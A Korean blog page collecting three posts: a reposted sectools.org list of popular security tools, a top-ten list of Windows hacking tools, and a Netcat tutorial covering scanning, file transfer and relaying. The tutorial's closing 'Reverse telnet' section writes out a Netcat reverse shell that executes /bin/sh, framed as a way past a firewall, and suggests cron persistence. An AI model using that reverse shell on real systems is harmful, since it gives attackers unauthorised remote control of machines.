'Netcat'에 해당되는 글 3건

  1. 2010.06.23 Top 100 Network Security Tools
  2. 2009.09.11 윈도우 해킹툴 10가지 제품
  3. 2009.04.01 Netcat (nc) 사용법 설명 및 예제
2010.06.23 18:53

Top 100 Network Security Tools

After the tremendously successful 2000 and 2003 security tools surveys, Insecure.Org is delighted to release this 2006 survey. I (Fyodor) asked users from the nmap-hackers mailing list to share their favorite tools, and 3,243 people responded. This allowed me to expand the list to 100 tools, and even subdivide them into categories. Anyone in the security field would be well advised to go over the list and investigate tools they are unfamiliar with. I discovered several powerful new tools this way. I also point newbies to this site whenever they write me saying “I don't know where to start”.

Respondents were allowed to list open source or commercial tools on any platform. Commercial tools are noted as such in the list below. No votes for the Nmap Security Scanner were counted because the survey was taken on a Nmap mailing list. This audience also biases the list slightly toward “attack” hacking tools rather than defensive ones.

Each tool is described by one ore more attributes:

new Did not appear on the 2003 list
/ Popularity ranking rose / fell the given number since the 2003 survey
  TITLE= Generally costs money. A free limited/demo/trial version may be available.
Linux Works natively on Linux
*BSD Works natively on OpenBSD, FreeBSD, Solaris, and/or other UNIX variants
OS X Works natively on Apple Mac OS X
Windows Works natively on Microsoft Windows
Command-line interface Features a command-line interface
GUI Interface Offers a GUI (point and click) interface
Source code Source code available for inspection.

Please send updates and suggestions (or better tool logos) to Fyodor. If your tool is featured or you think your site visitors might enjoy this list, you are welcome to use our link banners. Here is the list, starting with the most popular:

#1
  TITLE=
Linux
*BSD
OS X
Windows
GUI Interface
Nessus : Premier UNIX vulnerability assessment tool
Nessus was a popular free and open source vulnerability scanner until they closed the source code in 2005 and removed the free "registered feed" version in 2008. A limited “Home Feed” is still available, though it is only licensed for home network use. Some people avoid paying by violating the “Home Feed” license, or by avoiding feeds entirely and using just the plugins included with each release. But for most users, the cost has increased from free to $1200/year. Despite this, Nessus is still the best UNIX vulnerability scanner available and among the best to run on Windows. Nessus is constantly updated, with more than 20,000 plugins. Key features include remote and local (authenticated) security checks, a client/server architecture with a GTK graphical interface, and an embedded scripting language for writing your own plugins or understanding the existing ones.

See all vulnerability scanners


#2
Linux
*BSD
OS X
Windows
Command-line interface
GUI Interface
Source code
Wireshark : Sniffing the glue that holds the Internet together
Wireshark (known as Ethereal until a trademark dispute in Summer 2006) is a fantastic open source network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. You can interactively browse the capture data, delving down into just the level of packet detail you need. Wireshark has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. It also supports hundreds of protocols and media types. A tcpdump-like console version named tethereal is included. One word of caution is that Ethereal has suffered from dozens of remotely exploitable security holes, so stay up-to-date and be wary of running it on untrusted or hostile networks (such as security conferences).

See all packet sniffers


#3
  TITLE=
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Snort : Everyone's favorite open source IDS
This lightweight network intrusion detection and prevention system excels at traffic analysis and packet logging on IP networks. Through protocol analysis, content searching, and various pre-processors, Snort detects thousands of worms, vulnerability exploit attempts, port scans, and other suspicious behavior. Snort uses a flexible rule-based language to describe traffic that it should collect or pass, and a modular detection engine. Also check out the free Basic Analysis and Security Engine (BASE), a web interface for analyzing Snort alerts.

Open source Snort works fine for many individuals, small businesses, and departments. Parent company SourceFire offers a complimentary product line with more enterprise-level features and real-time rule updates. They offer a free (with registration) 5-day-delayed rules feed, and you can also find many great free rules at Bleeding Edge Snort.

See all intrusion detection systems


#4
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Netcat : The network Swiss army knife
This simple utility reads and writes data across TCP or UDP network connections. It is designed to be a reliable back-end tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need, including port binding to accept incoming connections. The original Netcat was released by Hobbit in 1995, but it hasn't been maintained despite its immense popularity. It can sometimes even be hard to find nc110.tgz. The flexibility and usefulness of this tool have prompted people to write numerous other Netcat implementations - often with modern features not found in the original. One of the most interesting is Socat, which extends Netcat to support many other socket types, SSL encryption, SOCKS proxies, and more. It even made this list on its own merits. There is also Chris Gibson's Ncat, which offers even more features while remaining portable and compact. Other takes on Netcat include OpenBSD's nc, Cryptcat, Netcat6, PNetcat, SBD, and so-called GNU Netcat.

See all Netcats


#5
new
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Metasploit Framework : Hack the Planet
Metasploit took the security world by storm when it was released in 2004. No other new tool even broke into the top 15 of this list, yet Metasploit comes in at #5, ahead of many well-loved tools that have been developed for more than a decade. It is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. It ships with hundreds of exploits, as you can see in their online exploit building demo. This makes writing your own exploits easier, and it certainly beats scouring the darkest corners of the Internet for illicit shellcode of dubious quality. Similar professional exploitation tools, such as Core Impact and Canvas already existed for wealthy users on all sides of the ethical spectrum. Metasploit simply brought this capability to the masses.

See all vulnerability exploitation tools


#6
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Hping2 : A network probing utility like ping on steroids
This handy little utility assembles and sends custom ICMP, UDP, or TCP packets and then displays any replies. It was inspired by the ping command, but offers far more control over the probes sent. It also has a handy traceroute mode and supports IP fragmentation. This tool is particularly useful when trying to traceroute/ping/probe hosts behind a firewall that blocks attempts using the standard utilities. This often allows you to map out firewall rulesets. It is also great for learning more about TCP/IP and experimenting with IP protocols.

See all packet crafting tools


#7
10
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Kismet : A powerful wireless sniffer
Kismet is an console (ncurses) based 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. It identifies networks by passively sniffing (as opposed to more active tools such as NetStumbler), and can even decloak hidden (non-beaconing) networks if they are in use. It can automatically detect network IP blocks by sniffing TCP, UDP, ARP, and DHCP packets, log traffic in Wireshark/TCPDump compatible format, and even plot detected networks and estimated ranges on downloaded maps. As you might expect, this tool is commonly used for wardriving. Oh, and also warwalking, warflying, and warskating, ...

See all wireless tools, and packet sniffers


#8
3
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Tcpdump : The classic sniffer for network monitoring and data acquisition
Tcpdump is the IP sniffer we all used before Ethereal (Wireshark) came on the scene, and many of us continue to use it frequently. It may not have the bells and whistles (such as a pretty GUI or parsing logic for hundreds of application protocols) that Wireshark has, but it does the job well and with fewer security holes. It also requires fewer system resources. While it doesn't receive new features often, it is actively maintained to fix bugs and portability problems. It is great for tracking down network problems or monitoring activity. There is a separate Windows port named WinDump. TCPDump is the source of the Libpcap/WinPcap packet capture library, which is used by Nmap among many other tools.

See all packet sniffers


#9
23
Windows
GUI Interface
Cain and Abel : The top password recovery tool for Windows
UNIX users often smugly assert that the best free security tools support their platform first, and Windows ports are often an afterthought. They are usually right, but Cain & Abel is a glaring exception. This Windows-only password recovery tool handles an enormous variety of tasks. It can recover passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. It is also well documented.

See all password crackers, and packet sniffers


#10
1
Linux
*BSD
OS X
Windows
Command-line interface
Source code
John the Ripper : A powerful, flexible, and fast multi-platform password hash cracker
John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes. Several other hash types are added with contributed patches. You will want to start with some wordlists, which you can find here, here, or here.

See all password crackers


#11
2
Linux
*BSD
OS X
Windows
Command-line interface
GUI Interface
Source code
Ettercap : In case you still thought switched LANs provide much extra security
Ettercap is a terminal-based network sniffer/interceptor/logger for ethernet LANs. It supports active and passive dissection of many protocols (even ciphered ones, like ssh and https). Data injection in an established connection and filtering on the fly is also possible, keeping the connection synchronized. Many sniffing modes were implemented to give you a powerful and complete sniffing suite. Plugins are supported. It has the ability to check whether you are in a switched LAN or not, and to use OS fingerprints (active or passive) to let you know the geometry of the LAN.

See all packet sniffers


#12
4
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Nikto : A more comprehensive web scanner
Nikto is an open source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired). It uses Whisker/libwhisker for much of its underlying functionality. It is a great tool, but the value is limited by its infrequent updates. The newest and most critical vulnerabilities are often not detected.

See all web vulnerability scanners


#13
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Ping/telnet/dig/traceroute/whois/netstat : The basics
While there are many whiz-bang high-tech tools out there to assist in security auditing, don't forget about the basics! Everyone should be very familiar with these tools as they come with most operating systems (except that Windows omits whois and uses the name tracert). They can be very handy in a pinch, although for more advanced usage you may be better off with Hping2 and Netcat.

#14
2
Linux
*BSD
OS X
Windows
Command-line interface
Source code
OpenSSH / PuTTY / SSH : A secure way to access remote computers
SSH (Secure Shell) is the now ubiquitous program for logging into or executing commands on a remote machine. It provides secure encrypted communications between two untrusted hosts over an insecure network, replacing the hideously insecure telnet/rlogin/rsh alternatives. Most UNIX users run the open source OpenSSH server and client. Windows users often prefer the free PuTTY client, which is also available for many mobile devices. Other Windows users prefer the nice terminal-based port of OpenSSH that comes with Cygwin. Dozens of other free and proprietary clients exist. You can explore them here or here.

#15
35
Linux
*BSD
OS X
Windows
Command-line interface
GUI Interface
Source code
THC Hydra : A Fast network authentication cracker which supports many different services
When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more then 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more. Like THC Amap this release is from the fine folks at THC.

See all password crackers


#16
new
Linux
*BSD
OS X
Windows
Command-line interface
GUI Interface
Source code
Paros proxy : A web application vulnerability assessment proxy
A Java based web proxy for assessing web application vulnerability. It supports editing/viewing HTTP/HTTPS messages on-the-fly to change items such as cookies and form fields. It includes a web traffic recorder, web spider, hash calculator, and a scanner for testing common web application attacks such as SQL injection and cross-site scripting.

See all web vulnerability scanners


#17
10
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Dsniff : A suite of powerful network auditing and penetration-testing tools
This popular and well-engineered suite by Dug Song includes many tools. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g, due to layer-2 switching). sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected ssh and https sessions by exploiting weak bindings in ad-hoc PKI. A separately maintained partial Windows port is available here. Overall, this is a great toolset. It handles pretty much all of your password sniffing needs.

See all packet sniffers


#18
7
Windows
GUI Interface
NetStumbler : Free Windows 802.11 Sniffer
Netstumbler is the best known Windows tool for finding open wireless access points ("wardriving"). They also distribute a WinCE version for PDAs and such named Ministumbler. The tool is currently free but Windows-only and no source code is provided. It uses a more active approach to finding WAPs than passive sniffers such as Kismet or KisMAC.

See all wireless tools, and packet sniffers


#19
18
Linux
*BSD
OS X
Windows
Command-line interface
Source code
THC Amap : An application fingerprinting scanner
Amap is a great tool for determining what application is listening on a given port. Their database isn't as large as what Nmap uses for its version detection feature, but it is definitely worth trying for a 2nd opinion or if Nmap fails to detect a service. Amap even knows how to parse Nmap output files. This is yet another valuable tool from the great guys at THC.

See all application-specific scanners


#20
12
  TITLE=
Windows
GUI Interface
GFI LANguard : A commercial network security scanner for Windows
GFI LANguard scans IP networks to detect what machines are running. Then it tries to discern the host OS and what applications are running. It also tries to collect Windows machine's service pack level, missing security patches, wireless access points, USB devices, open shares, open ports, services/applications active on the computer, key registry entries, weak passwords, users and groups, and more. Scan results are saved to an HTML report, which can be customized/queried. It also includes a patch manager which detects and installs missing patches. A free trial version is available, though it only works for up to 30 days.

See all vulnerability scanners


#21
new
Linux
*BSD
OS X
Windows
Command-line interface
Source code
Aircrack : The fastest available WEP/WPA cracking tool
Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).

See all wireless tools, and password crackers


#22
4
Windows
GUI Interface
Superscan : A Windows-only port scanner, pinger, and resolver
SuperScan is a free Windows-only closed-source TCP/UDP port scanner by Foundstone. It includes a variety of additional networking tools such as ping, traceroute, http head, and whois.

See all port scanners


#23
2
Linux
Command-line interface
Source code
Netfilter : The current Linux kernel packet filter/firewall
Netfilter is a powerful packet filter implemented in the standard Linux kernel. The userspace iptables tool is used for configuration. It now supports packet filtering (stateless or stateful), all kinds of network address and port translation (NAT/NAPT), and multiple API layers for 3rd party extensions. It includes many different modules for handling unruly protocols such as FTP. For other UNIX platforms, see Openbsd PF (OpenBSD specific), or IP Filter. Many personal firewalls are available for Windows (Tiny,Zone Alarm, Norton, Kerio, ...), though none made this list. Microsoft included a very basic firewall in Windows XP SP2, and will nag you incessantly until you install it.

See all firewalls


#24
new
Windows
Command-line interface
GUI Interface
Sysinternals : An extensive collection of powerful windows utilities
Sysinternals provides many small windows utilities that are quite useful for low-level windows hacking. Some are free of cost and/or include source code, while others are proprietary. Survey respondents were most enamored with:
  • ProcessExplorer for keeping an eye on the files and directories open by any process (like LSoF on UNIX).
  • PsTools for managing (executing, suspending, killing, detailing) local and remote processes.
  • Autoruns for discovering what executables are set to run during system boot up or login.
  • RootkitRevealer for detecting registry and file system API discrepancies that may indicate the presence of a user-mode or kernel-mode rootkit.
  • TCPView, for viewing TCP and UDP traffic endpoints used by each process (like Netstat on UNIX).
Update: Microsoft acquired Sysinternals in July 2006, promising that “Customers will be able to continue building on Sysinternals' advanced utilities, technical information and source code”. Less than four months later, Microsoft removed most of that source code. Future product direction is uncertain.

See all rootkit detectors


#25
5
  TITLE=
Windows
GUI Interface
Retina : Commercial vulnerability assessment scanner by eEye
Like Nessus, Retina's function is to scan all the hosts on a network and report on any vulnerabilities found. It was written by eEye, who are well known for their security research.

See all vulnerability scanners



출처 : http://sectools.org/

Trackback 3 Comment 0
2009.09.11 20:42

윈도우 해킹툴 10가지 제품

Top 10 Windows Hacking Tools
This is the Collection of Best Windows Hacking Tools:

1. Cain & Abel – Cain & Abel is a password recovery tool for the Microsoft Windows Operating System. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.
http://www.oxid.it/cain.html

2. SuperScan – SuperScan is a powerful TCP port scanner, pinger, resolver. SuperScan 4 (Current Version) is a completely-rewritten update of the highly popular Windows port scanning tool, SuperScan.
http://www.foundstone.com/index.htm?sub ··· scan.htm

3. GFI LANguard Network Security Scanner – GFI LANguard N.S.S. is a network vulnerability management solution that scans your network and performs over 15,000 vulnerability assessments. It identifies all possible security threats and provides you with tools to patch and secure your network. GFI LANguard N.S.S. was voted Favorite Commercial Security Tool by NMAP users for 2 years running and has been sold over 200,000 times!
http://www.gfi.com/adentry.asp?adv=814&loc=3

4. Retina – Retina Network Security Scanner, recognised as the industry standard for vulnerability assessment, identifies known security vulnerabilities and assists in prioritising threats for remediation. Featuring fast, accurate, and non-intrusive scanning, users are able to secure their networks against even the most recent of discovered vulnerabilities.
http://www.eeye.com/html/Products/Retina/index.html

5. SamSpade – SamSpade provides a consistent GUI and implementation for many handy network query tasks. It was designed with tracking down spammers in mind, but can be useful for many other network exploration, administration, and security tasks. It includes tools such as ping, nslookup, whois, dig, traceroute, finger, raw HTTP web browser, DNS zone transfer, SMTP relay check, website search, and more.
http://www.samspade.org/ssw/

6. N-Stealth – N-Stealth is a commercial web server security scanner. It is generally updated more frequently than free web scanners such as whisker and nikto, but you have to pay for the privilege.
http://www.nstalker.com/nstealth/

7. Solarwinds – Solarwinds contains many network monitoring, discovery and attack tools. The advanced security tools not only test internet security with the SNMP Brute Force Attack and Dictionary Attack utilities but also validate the security on Cisco Routers with the Router Security Check. The Remote TCP Reset remotely display all active sessions on a device and the Password Decryption can decrypt Type 7 Cisco Passwords. The Port Scanner allows testing for open TCP ports across IP Address and port ranges or selection of specific machines and ports.
http://www.solarwinds.net/

8. Achilles – The first publicly released general-purpose web application security assessment tool. Achilles acts as a HTTP/HTTPS proxy that allows a user to intercept, log, and modify web traffic on the fly. Due to a cyber squatter, Achilles is no longer online at its original home of www.Digizen-Security.com…OOPS!
http://www.mavensecurity.com/achilles/

9. CookieDigger - CookieDigger helps identify weak cookie generation and insecure implementations of session management by web applications. The tool works by collecting and analyzing cookies issued by a web application for multiple users. The tool reports on the predictability and entropy of the cookie and whether critical information, such as user name and password, are included in the cookie values.
http://foundstone.com/resources/proddes ··· gger.htm

10. Netcat (The Network SwissArmy Knife) – Netcat was originally a Unix utility which reads and writes data across network connections, using TCP or UDP protocol. It is designed to be a reliable “back-end” tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.
http://www.atstake.com/research/tools/n ··· ities/

Trackback 2 Comment 0
2009.04.01 19:20

Netcat (nc) 사용법 설명 및 예제

Netcat(이 하 nc로 표기)은 Network connection 에서 raw-data read, write를 할수 있는 유틸리티 프로그램이다. 일반적으로는 UNIX의 cat과 비슷한 사용법을 가지고 있지만 cat이 파일에 쓰거나 읽듯이 nc는 network connection에 읽거나 쓴다. 이것은 스크립트와 병용하여 network에 대한 debugging, testing tool로써 매우 편리하지만 반면 해킹에도 이용범위가 매우 넓다.

Options
--------------------------------------------------------------------------

usage: nc [options] [target host] [ports]

-n : 호스트 네임과 포트를 숫자로만 입력받는다.

-v : verbosity 를 증가 시킨다. 더 많은 정보를 얻을수 있다.

-o [filename]: 보내거나 받은 데이터를 헥스덤프하여 파일에 저장한다.

-u : TCP connection 대신에 UDP connection 이 이루어 진다.

-p [port number or name]: local-port 를 지정한다. 주로 -l 과 같이 사용하게 된다.

-s [ip address or DNS]: local ip address 를 지정한다. 모든 플렛폼에서 지원되지는 않는다.

-l : listen 모드로 nc을 띠우게 된다. 당연히 target host는 입력하지 않는다. -p와 같이 사용하게 된다. nc를 server 로서 쓸때 사용.

-e [filename]: -DGAPING_SECURITY_HOLE 옵션으로 Make 되었을 때 사용가능하다.
connection 이 이루어 졌을 때 file을 exec 시킨다. -l 과 같이 사용되면 한 instance만을 사용하는 inetd와 비슷하다.

-t : -DTELNET 옵션으로 컴파일 되었을 때 사용가능하다. telnetd에 접속이 가능하도록
접속시 telnet과 같은 협상과정을 거친다.

-i [interval time]: nc는 일반적으로 8K 씩 데이터를 보내고 받는데 그렇게 Standard input의 한 라인씩 interval time마다 보내게 된다.

-z : connection을 이루기위한 최소한의 데이터 외에는 보내지 않도록 하는 옵션.

-r : port 지정이 여러개로 되어 있으면 이때 scanning 순서를 randomize하고 (일반적으로 범위로 지정하면 높은 번호의 포트부터 스캔한다) 또한 -p 옵션에서 지정가능한 local port도 randomize한다. 이때 주의 할 것은 -p가 -r을 override 한다는 것이다.

-g : ??

-G : ??

Using
--------------------------------------------------------------------------

multi-port connection

nc는 한 호스트에 한 번에 여러 connection 을 만들수 있다. 이 때 다음과 같이 여러개의 포트를 기술할 수 있다.
nc [target host] 20-30

이때 std input으로 입력되는 데이터는 한꺼번에 보내지게 된다.

port scanning

target host 의 지정된 범위내에서의 어떤 포트가 어떻게 사용되고 있는 가를 검색할 수 있다.
nc -v -w 3 -z sparcs.kaist.ac.kr 20-30, 70-90

위의 명령은 다음 결과와 같이 20-30, 70-90 까지의 포트들에 대한 정보를 보여준다.

sparcs.kaist.ac.kr [143.248.8.2] 25 (smtp) open
sparcs.kaist.ac.kr [143.248.8.2] 23 (telnet) open
sparcs.kaist.ac.kr [143.248.8.2] 21 (ftp) open
sparcs.kaist.ac.kr [143.248.8.2] 80 (http) open
sparcs.kaist.ac.kr [143.248.8.2] 79 (finger) open
sparcs.kaist.ac.kr [143.248.8.2] 70 (gopher) open

이것보다 더 자세한 정보를 얻고자 할때는

echo QUIT | nc -v -w 3 [target host] [ports]

라고 하면 응답이나 에러메세지로부터 버전정보등도 얻을 수 있다.

[songa@sparcs.kaist.ac.kr] ~ 13 echo QUIT | nc -v -w 3 sparcs 20-30, 70-90
sparcs.kaist.ac.kr [143.248.8.2] 25 (smtp) open
220 sparcs.kaist.ac.kr ESMTP Sendmail 8.8.7/8.8.7; Fri, 8 Jan 1999 15:21:36
+0900
221 sparcs.kaist.ac.kr closing connection
sparcs.kaist.ac.kr [143.248.8.2] 23 (telnet) open
sparcs.kaist.ac.kr [143.248.8.2] 21 (ftp) open
220 sparcs.kaist.ac.kr FTP server (Version wu-2.4.2-academ[BETA-18](1) Mon Aug 3
19:17:20 EDT 1998) ready.
221 Goodbye.
sparcs.kaist.ac.kr [143.248.8.2] 80 (http) open
sparcs.kaist.ac.kr [143.248.8.2] 79 (finger) open
finger: QUIT: no such user.
sparcs.kaist.ac.kr [143.248.8.2] 70 (gopher) open


simple data transfer agent

nc를 이용해 간단한 data 전송을 할 ?있다.
receiver : nc -l -p 1234 | uncompress -c | tar xvfp -

sender : tar cfp - /some/dir | compress -c | nc -w 3 othermachine 1234


substitute of inetd

nc를 이용해 inetd에 등록하지 않고, 별다른 네트웍 설정 없이 프로그램을 테스트할 수 있다.
nc -l -p [port] -e [filename]


/*test.c*/
#include < stdio.h >
main(){
getchar();
printf("<html><head></head><body>햐하</body></html>\n");


nc -l -p 1234 -e test

이렇게 하면 간이 www server 도 된다.

connection redirecting
inetd.conf을 아래와 같은 형식으로 고쳐서 다른 서버로 redirecting을 할수 있다.

www stream tcp nowait /etc/tcpd /bin/nc -w 3 zero 80

위의 것은 현재 서버에서 http서비스를 zero서버로 redirect시켰다.

performance testing

nc를 이용해서 큰 데이터를 서로 보내고 받음으로써 network의 performance를 테스트할수있다.
[songa@sparcs.kaist.ac.kr] /etc 31 > yes AAAA | nc -v -v -l -p 1234 > /dev/nul&
[1] 3258 3259
[songa@sparcs.kaist.ac.kr] /etc 32 > listening on [any] 1234 ...
[songa@sparcs.kaist.ac.kr] /etc 32 >
[songa@sparcs.kaist.ac.kr] /etc 32 >
[songa@sparcs.kaist.ac.kr] /etc 32 > yes BBBB | nc sparcs 1234 > /dev/null &
[2] 3475 3476
[songa@sparcs.kaist.ac.kr] /etc 33 > connect to [143.248.8.2] from sparcs.kaisac.kr
[143.248.8.2] 31844
[songa@sparcs.kaist.ac.kr] /etc 33 > kill %
[songa@sparcs.kaist.ac.kr] /etc 34 > sent 23470080, rcvd 21675480





그리고

http://www.wowhacker.com/BoArD/view.php?id=abc_lecture&page=1&category=&sn=off&ss=on&sc=on&keyword=netcat&select_arrange=headnum&desc=asc&no=152

여기도 있구요..

지금부터 아래내용의 문서는

http://security.xmecca.com의 Oprix님이 쓰신 글입니다





Netcat == nc

이 문서를 쓰실 때 출처(http://security.xmecca.com)를 꼭 적어 주시면
어느 곳이나 쓰실 수 있습니다.
BBS에 글까지 남겨주시면 더욱 고맙겠습니다.

Netcat ReadMe를 부분부분 번역했습니다.
===========================================================

Netcat(간단하게 nc라고도 함)은 http://www.l0pht.com/users/10pht/nc110.tgz 에서 구할 수 있습니다.

Netcat은 TCP나 UDP 네트워크 연결을 통해서 데이터를 읽거나 쓸 수 있도록 만든 프로그램입니다.
특별하게 쉘 스크립트나 다른 프로그램에서 사용하도록 만든 "Back-end" 툴입니다.
그와 동시에 약간의 재미있는 여러가지 연결로 네트워크를 디버깅하고 조사할 수 있게 만든 툴입니다.
Netcat은 실제로 nc라는 프로그램이름을 가지고 있습니다.
예전부터 신비롭지만 표준적인 유닉스 툴로 제공되었습니다. ( 그런가 -_-;;)

간단한 사용법으로 "nc host port" 하면 주어진 호스트의 특정 포트로 TCP 연결을 합니다. 그리고
여러분의 표준 입력을 그 쪽으로 보냅니다. 그리고 표준 출력을 연결을 통해서
이쪽에 보여줍니다. 이건 한쪽 네트워크가 다운 될때까지 계속할 수 있습니다. end-of-file을
입력하면 종료되는 다른 프로그램과 다르게 계속 작동합니다.

또한 NetCat은 서버로 사용할 수 있습니다. 지정한 포트로 들어오는 연결을 기다리도록 사용할 수 있습니다.

그리고 UDP를 통해서도 이렇게 할 수 있습니다. TCP 보다 덜 신뢰되고 어떤
시스템에서는 많은 데이터를 보낼 수 없지만 유용할 때가 있습니다.

NetCat이 할 수 있는 대표적인 일로는

Outbound or inbound connections, TCP or UDP, to or from any ports
Full DNS forward/reverse checking, with appropriate warnings
Ability to use any local source port
Ability to use any locally-configured network source address
Built-in port-scanning capabilities, with randomizer
Built-in loose source-routing capability
Can read command line arguments from standard input
Slow-send mode, one line every N seconds
Hex dump of transmitted and received data
Optional ability to let another program service established connections
Optional telnet-options responder

이것이 있습니다. (이건 여러분 각자가 번역해 보세요.)

만드는 법

http://www.l0pht.com/users/10pht/nc110.tgz 에서 구할 수 있습니다.

압축을 풀고

특별하게 설정할 건 없고

Makefile에서 -DGAPING_SECURITY_HOLE 이 부분을 추가 시켜주는게 중요합니다.
이게 없으면 유용한 -e 옵션을 쓰지 못합니다.

### HARD TARGETS

nc: netcat.c
$(LD) $(DFLAGS) $(XFLAGS) $(STATIC) -DGAPING_SECURITY_HOLE -o nc netcat.c $(XLIBS)

고친다음 make linux 하면 됩니다.

자 사용해 보기 전에 도움말을 봅시다.

$ ./nc -h
[v1.10]
어느 곳에 접속할때: nc [-옵션] hostname port[s] [ports] ...
접속을 기다릴때: nc -l -p port [-options] [hostname] [port]
options:
-e prog 프로그램 접속후 프로그램을 실행한다. [ 위험 ]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 도움말
-i secs 라인을 보낼 때 마다 secs 만큼 쉰다. 스캔할때 사용
-l listen 모드 , 들어오는 패킷에 반응한다.
-n DNS를 이용하지 않고 IP 주소를 사용한다.
-o file 내용을 file에 기록한다.
-p port 로컬 포트 번호
-r 컴퓨터가 마음대로 포트를 지정한다.
-s addr local source address
-u UDP 모드
-v 출력을 자세하게 한다.
-w secs 마지막으로 읽은 다음 secs 후에 종료한다.
-z 아무 데이터도 안 보낸다. scan 때 사용
포트는 하나하나 지정하거나 범위를 쓸 수 있습니다. 낮은 포트-높은 포트




이 문서를 쓰실 때 출처(http://security.xmecca.com)를 꼭 적어 주시면
어느 곳이나 쓰실 수 있습니다.
BBS에 글까지 남겨주시면 더욱 고맙겠습니다.

Netcat ReadMe를 부분부분 번역했습니다.
===========================================================
간단한 스캐닝 툴로 사용할 수 있습니다.

$ echo QUIT | nc -v -w 5 localhost 25-100
localhost.localdomain [127.0.0.1] 25 (smtp) open
220 s210-219-158-88.thrunet.ne.kr ESMTP Sendmail 8.9.3/8.9.3; Thu, 31 May 2001 00:30:34 +0900
221 s210-219-158-88.thrunet.ne.kr closing connection

$ nc -v -w 5 localhost 25-100 이렇게 하면 열린 포트만 볼 수 있습니다.

파일 전송에도 사용됩니다.

보내는 쪽
$ cat html.tgz | nc -w 3 x.x.x.x 1234

받는 쪽
$ nc -l -p 1234 > html.tgz

간단한 방화벽으로 사용됩니다.

ined.conf에

[realwww는 실제 웹서버 주소]

www stream tcp nowait nobody /etc/tcpd /bin/nc -w 3 realwww 80

네트워크 성능 평가

서로 순서를 달리해서 해 보았습니다.

A 서버
$ yes BBBBBBBBBBBBBBBBBBBBBB | /tmp/nc x.x.x.x 2222 > /dev/null
Broken pipe
$ yes AAAAAAAAAAAAAAAAAAAAAA | /tmp/nc -v -v -l -p 2222 > /dev/null
listening on [any] 2222 ...
connect to [x.x.x.x] from x.x.x.x [x.x.x.x] 2790
sent 6643712, rcvd 9542784

A가 많이 받음

B 서버
$ yes AAAAAAAAAAAAAAAAAAAAAA | nc -v -v -l -p 2222 > /dev/null
listening on [any] 2222 ...
203.239.110.12: inverse host lookup failed: Unknown host
connect to [x.x.x.x] from (UNKNOWN) [x.x.x.x] 1672
sent 11145216, rcvd 8092008
$ yes BBBBBBBBBBBBBBBBBBBBBB | nc x.x.x.x 2222 > /dev/null
Broken pipe

B가 많이 보냄

로그 데이타 보내기

쉘 스크립트에서 로그도 보낼 수 있습니다.

echo '<38>message' | nc -w 1 -u loggerhost 514

간이 웹 서버
/* 간이 웹서버는 출처가 http://security.kaist.ac.kr/docs/netcat.html 입니다. */
nc를 이용해 간단한 웹서버로도 사용할 수 있습니다.

nc -l -p [port] -e [filename]

/*test.c*/
#include < stdio.h >
main(){
getchar();
printf("햐하n");

nc -l -p 1234 -e test

Reverse telnet

먼저 이런 상황을 생각해 봅시다. A라는 서버에서는 어느 곳이나 접속할
수 있습니다. B라는 서버에서는 방화벽 때문에 A라는 곳에 접속할 수 없
습니다. 이럴 경우 사용하는게 Reverse telnet 이라는 기술입니다.
즉 A라는 곳에서 B라는 곳으로 접속을 하지만 B에서 명령을 내릴 수 있다는
겁니다. crontab에 저장해두면 쓸모 있겠지요.

B 서버의 설정

$ nc -l -p 1234

A 서버의 설정
$ nc -e /bin/sh B서버 주소 1234

B에서 명령을 내릴 수 있습니다.

$ nc -l -p 1234
ls <-- 사용자가 친 명령
Desktop
Mail
collect.data
dead.letter
epcs2.c
face2.gif
face_.gif
html.tgz

실력이 되시면 netcat Readme를 꼭 읽어보세요.


// 팁으로 사용하시라구 Reverse Telnet 부분도 넣었습니다

// 물론, 출처는 Oprix님입니다

아래에서 간단한 nc 기능 으로 Reverse telnet 을 구현해 보았습니다. 그런데 만약 상대편에 Netcat 이 없다면??

